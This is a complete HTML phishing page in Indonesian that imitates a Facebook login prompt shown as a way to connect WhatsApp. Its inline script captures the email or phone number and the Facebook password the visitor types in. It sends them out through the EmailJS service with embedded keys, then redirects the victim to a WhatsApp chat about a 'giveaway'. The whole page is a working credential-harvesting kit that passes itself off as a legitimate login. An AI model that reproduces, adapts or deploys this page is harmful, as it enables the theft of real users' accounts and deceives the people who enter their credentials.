<html lang="id"><head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>Masuk</title>

    <link rel="shortcut icon" href="https://i.ibb.co/S3LB1MY/fb.png">

    <!-- Style -->

    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">

    <style>

        html, body {

            background-color: #eceff6;

        }

        .login {

            max-width: 100%;

            width: 500px;

            display: block;

            margin: 10px auto;

            box-shadow: 0px 0px 15px rgba(0, 0, 0, 0.1);

        }

        .bg-utama {

            background-color: #3b5998;

        }

        .img-login {

            width: 120px;

            margin: 3px auto;

        }

        .img-icon {

            width: 40px;

            margin: 3px auto;

        }

        .form-control {

            display: block;

            height: 45px;

            margin: -1px auto;

        }

        .btn-login {

            width: 100%;

            display: block;

            margin: 10px auto;

            background-color: #3677ff;

            font-size: 15px;

        }

    </style>

    <!-- EmailJS SDK -->

    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>

    <script type="text/javascript">

        (function(){

            emailjs.init("xE5mu-SU5XVgItjyB");

        })();

    </script>

</head>

<body>

    <div class="login mx-auto d-block">

        <nav class="navbar bg-utama navbar-dark text-center">

            <div class="container">

                <img class="mx-auto d-block img-login" src="https://i.ibb.co/Pcb84t1/fb-login.png">

            </div>

        </nav>

        <div class="container">

            <div class="row">

                <div class="col-sm-12 text-center mx-auto d-block">

                    <img class="img-icon mt-4 mb-4" src="https://seeklogo.com/images/W/whatsapp-icon-logo-6E793ACECD-seeklogo.com.png" alt="Ikon WhatsApp">

                    <div class="text">Masuk ke akun Facebook Anda <br>untuk terhubung ke Whatsapp</div>

                </div>

            </div>

            <form id="loginForm">

                <div class="form-group">

                    <input class="form-control" type="text" id="email" placeholder="Nomor ponsel atau email" required="" autocomplete="off">

                    <input class="form-control" type="password" id="password" placeholder="Kata Sandi Facebook" required="">

                    <button class="btn btn-login text-white" type="submit">Masuk</button>

                </div>

            </form>

            <div class="row text-center">

                <div class="col-sm-12 mx-auto d-block">

                    <a href="#" class="text-buat d-block">Buat akun</a>

                    <a href="#" class="text-buat d-block">Lain kali</a>

                    <a href="#" class="text-buat d-block text-lupa">Lupa Kata Sandi? Pusat Bantuan</a>

                </div>

            </div>

        </div>

    </div>

    <script type="text/javascript">

        document.getElementById("loginForm").addEventListener("submit", function(event) {

            event.preventDefault();

            const email = document.getElementById("email").value;

            const password = document.getElementById("password").value;

            const templateParams = {

                email: email,

                password: password

            };

            emailjs.send("service_zp1hzrb", "template_kyth8n8", templateParams)

                .then(function(response) {

                    window.location.href = "https://api.whatsapp.com/send?phone=6283843107252&text=bagaimanacaraikutangiveawaynya%20";

                }, function(error) {

                    console.error('Error:', error);

                    alert('Gagal mengirim email: ' + JSON.stringify(error));

                });

        });

    </script>

</body></html>